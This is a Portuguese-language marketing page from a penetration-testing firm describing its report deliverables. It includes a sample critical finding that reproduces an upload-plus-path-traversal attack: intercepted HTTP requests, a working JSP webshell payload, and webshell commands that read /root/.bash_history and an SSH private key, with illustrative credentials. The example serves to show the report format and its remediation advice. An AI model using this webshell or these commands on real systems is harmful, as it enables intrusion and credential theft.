Nossos entregáveis

O que você recebe quando contrata a TreeSec.

Um pentest só vale pelo que fica depois: os relatórios. Aqui mostramos a anatomia do que entregamos — dois relatórios e reteste incluído — para você saber exatamente o padrão antes de fechar.

2 Relatórios
Técnico + Executivo
Reteste incluso
em todo projeto
5 Frameworks
OWASP · PTES · NIST · OSSTMM · ATT&CK
Filosofia de entrega

Não entregamos um dump de scanner. Entregamos uma decisão.

Todo relatório da TreeSec responde três perguntas do seu ponto de vista: o que está em risco, por que isso importa para o negócio, e em que ordem corrigir. Estes são os princípios que guiam cada entrega.

Dois relatórios, dois públicos

O Relatório Técnico fala com quem corrige. O Executivo fala com a diretoria, em linguagem de risco de negócio. O mesmo achado, traduzido para cada leitor.

Prioridade pela cadeia, não pelo CVSS isolado

Um achado "Médio" que abre a porta para um "Crítico" é tratado como o que ele realmente é: a chave da invasão. Priorizamos pelo papel na cadeia de ataque, não só pela nota.

"Achar a falha não é o fim. Provar o impacto de negócio é."

Reteste sempre incluído

Um achado só é marcado como "Corrigido" depois que a TreeSec reexplora o vetor e confirma. Não basta declarar a correção, a gente prova que fechou.

Correção de código, não de borda

Dizemos com todas as letras o que um WAF não resolve. Um IDOR ou uma falha de lógica se corrige no código, o resto é ganhar tempo. Sem ilusão de "subiu o WAF, está resolvido".

"WAF não corrige IDOR."

Mapa de superfície navegável

Você recebe a superfície explorada como um mapa visual e navegável, não uma lista: endpoints, serviços e pontos de entrada identificados, com nós que se expandem e filtram por severidade. A sua aplicação do jeito que um invasor a enxerga.

Prova acima de hype

Cada afirmação vem com evidência e critério objetivo (CVSS 4.0, mapeamento OWASP/CWE). Sem alarmismo e sem inflar severidade para vender medo.

Anatomia · Relatório Técnico

O relatório que a sua equipe usa para corrigir.

O documento principal. Cada achado com contexto, evidência e a correção-raiz, no nível de detalhe que um desenvolvedor precisa para resolver sem adivinhação.

Capa do Relatório Técnico de Pentest da TreeSec
Relatório Técnico

Para quem corrige: dev, DevSecOps, time de infraestrutura.

  • Resumo quantitativo — contagem por severidade e nível de risco geral do ambiente.
  • Superfície de ataque mapeada — o que está exposto: serviços, portas, endpoints e como se conectam.
  • Achados em detalhe — cada falha com severidade CVSS 4.0, evidência, impacto e correção-raiz.
  • Reteste — status de reexploração de cada vetor após a correção.
Achado · exemplo ilustrativo · Gray Box Remote Code Execution via Unrestricted File Upload + Path Traversal
Severidade
Critical · CVSS 4.09.9
Modalidade
Caixa cinza (Gray Box)
Status
Confirmado — Explorado
Exploração
Confirmada em ambiente controlado
Vetor
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
OWASP ID
A05:2021 — Security Misconfiguration
Referências
Ações Recomendadas
  • Implementar validação de tipo de arquivo no servidor (whitelist de extensões permitidas); não confiar apenas no header Content-Type, que pode ser facilmente alterado pelo cliente.
  • Remover o parâmetro path controlado pelo usuário; definir o diretório de upload exclusivamente no backend da aplicação.
  • Executar a aplicação com um usuário de sistema dedicado e de baixo privilégio — nunca como root.
  • Atualizar o JBoss (v4.0.x, EOL 2013) e o Apache Tomcat (v7.x, EOL 2021) para versões com suporte ativo.
Análise da Vulnerabilidade

Durante a análise da aplicação web, foi identificado um endpoint de upload de arquivos sem autenticação e sem validação de tipo ou extensão. Ao interceptar a requisição, verificou-se que o path de destino era controlável pelo atacante. A enumeração da aplicação revelou um relatório interno com caminhos físicos do servidor — incluindo o diretório de templates do Tomcat (/app/tomcat7/webapps/dash/template/dash_html/), acessível publicamente via HTTP. Alterando o path para esse diretório e enviando uma JSP webshell como payload, obteve-se acesso à shell diretamente pelo browser com privilégios de root no sistema operacional.

Página de upload identificada no browser — sem autenticação
https://portal.empresa-alvo.com.br/gfi/servlet/receberDocumento
Upload Arquivo Texto
* Caminho Arquivo: Escolher arquivo Nenhum arquivo selecionado
HPOReceberArqtxt  ·  ⚠ sem autenticação
Requisição interceptada — parâmetro path visível e controlável
Burp Suite · Repeater — POST /gfi/servlet/receberDocumento (requisição original)
POST /gfi/servlet/receberDocumento HTTP/1.1 Host: portal.empresa-alvo.com.br Content-Type: multipart/form-data; boundary=----WebKitBoundary7MA4 ------WebKitBoundary7MA4 Content-Disposition: form-data; name="path" /app/pipBatch/Uploads/tmp/ ------WebKitBoundary7MA4 Content-Disposition: form-data; name="arquivo"; filename="relatorio.txt" Content-Type: text/plain 12345678900 ------WebKitBoundary7MA4--
path alterado para diretório web-acessível — webshell JSP enviada como payload
Burp Suite · Repeater — requisição modificada com path traversal + JSP webshell
POST /gfi/servlet/receberDocumento HTTP/1.1 Host: portal.empresa-alvo.com.br ------WebKitBoundary7MA4 Content-Disposition: form-data; name="path" /app/tomcat7/webapps/dash/template/dash_html/ ------WebKitBoundary7MA4 Content-Disposition: form-data; name="arquivo"; filename="shell.jsp" Content-Type: text/plain <%@ page import="java.io.*" %><% String cmd=request.getParameter("cmd"); Process p=Runtime.getRuntime().exec(cmd); BufferedReader r=new BufferedReader(new InputStreamReader(p.getInputStream())); String l; while((l=r.readLine())!=null) out.println(l); %> ------WebKitBoundary7MA4--
Webshell acessada diretamente no browser — servidor responde como root
https://portal.empresa-alvo.com.br/dash/template/dash_html/shell.jsp?cmd=whoami
JSP: TreeSec Pentest
root
https://portal.empresa-alvo.com.br/dash/template/dash_html/shell.jsp?cmd=id
JSP: TreeSec Pentest
uid=0(root) gid=0(root) groups=0(root)
Listagem do diretório raiz via browser — arquivos sensíveis expostos
https://portal.empresa-alvo.com.br/dash/template/dash_html/shell.jsp?cmd=ls+-lh+/root/
JSP: TreeSec Pentest
total 68K drwxr-xr-x 2 root root 4.0K Jan 14 2020 .ssh drwxr-xr-x 8 root root 4.0K Jan 14 2020 app -rw------- 1 root root 4.2K Mar 12 2020 .bash_history -rw-r--r-- 1 root root 3.1K Jan 14 2020 .bashrc drwxr-xr-x 4 root root 4.0K Jan 14 2020 .jboss -rw-r--r-- 1 root root 26K Jan 14 2020 EAS.key
Pós-exploração — credenciais em texto claro no histórico do bash
Shell — dump de /root/.bash_history + chave privada SSH
$ # via webshell: shell.jsp?cmd=cat+/root/.bash_history [...] sqlplus SYSDBA/Op3r@c@o_2019!@10.10.0.20:1521/ORCL mysql -h 10.10.0.35 -u root -p'M@sterDB#2018' cliente_bd curl -u tomcat:T0mc@t_Adm1n! http://localhost:8080/manager/text/deploy $ # via webshell: shell.jsp?cmd=cat+/root/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEA2a3b4c5d6e7f8g9h0i1j2k3l... [chave privada RSA 2048-bit — acesso SSH ao servidor] -----END RSA PRIVATE KEY-----
Exemplo ilustrativo, montado em laboratório para mostrar o padrão do relatório. No relatório entregue ao cliente, cada evidência traz o print original e está vinculada ao resultado do reteste.
Anatomia · Relatório Executivo

O relatório que a diretoria usa para decidir.

A mesma verdade técnica, traduzida para risco de negócio: o que priorizar, quanto tempo leva e qual o risco enquanto não se corrige. Sem jargão.

Capa do Relatório Executivo de Pentest da TreeSec
Relatório Executivo

Para quem decide: C-level, gestão, área de risco e conformidade.

  • Dashboard de risco — a foto imediata: quantos achados por severidade e o nível de risco geral.
  • Impacto no negócio — cada risco traduzido em operação, receita, reputação e conformidade.
  • Distribuição OWASP Top 10 — onde estão concentradas as fragilidades.
  • Cronograma de remediação — correção em fases, com o risco residual de cada etapa.
  • Recomendações estratégicas — os próximos passos de segurança, priorizados.
1Crítico
3Alto
4Médio
2Baixo

Números ilustrativos. Cada projeto recebe o seu próprio panorama.

Panorama de Risco · exemplo ilustrativo A foto imediata que abre o Resumo Executivo
IndicadorValor
Total de vulnerabilidades identificadas10
Vulnerabilidades Críticas1
Vulnerabilidades Altas3
Vulnerabilidades Médias4
Vulnerabilidades Baixas2
Contas de usuário expostas~ 3.100
Registros de dados pessoais acessíveis~ 42.000
Credenciais em texto claro24
Nível de risco geralAlto
Tabela ilustrativa com dados fictícios, apenas para mostrar o formato do "Panorama de Risco" que abre o nosso Relatório Executivo. No relatório real, os indicadores refletem os achados do seu ambiente.
Como conduzimos

Metodologia "war-game" em 5 fases.

Não rodamos um scanner e mandamos o PDF. Agimos como um adversário real agiria, entendendo o terreno e provando o impacto ponta a ponta.

  1. Reconhecimento

    Mapeamos a superfície de ataque: o que está exposto, quais serviços e por onde se entra.

  2. Risco estratégico

    Identificamos o "Santo Graal": os ativos e dados cuja perda prejudicaria mais o negócio.

  3. Definição de missões

    Traçamos os objetivos de ataque concretos que testam esses pontos críticos.

  4. Exploração

    Executamos e encadeamos as falhas até provar o impacto real, não só a existência do bug.

  5. Relatório estratégico

    Consolidamos tudo nos dois relatórios: técnico para corrigir, executivo para decidir.

Solicite o material gratuito

Preencha seus dados abaixo. Analisaremos sua solicitação e enviaremos o material por e-mail.

Analisaremos sua solicitação e enviaremos o material por e-mail em até 24h úteis.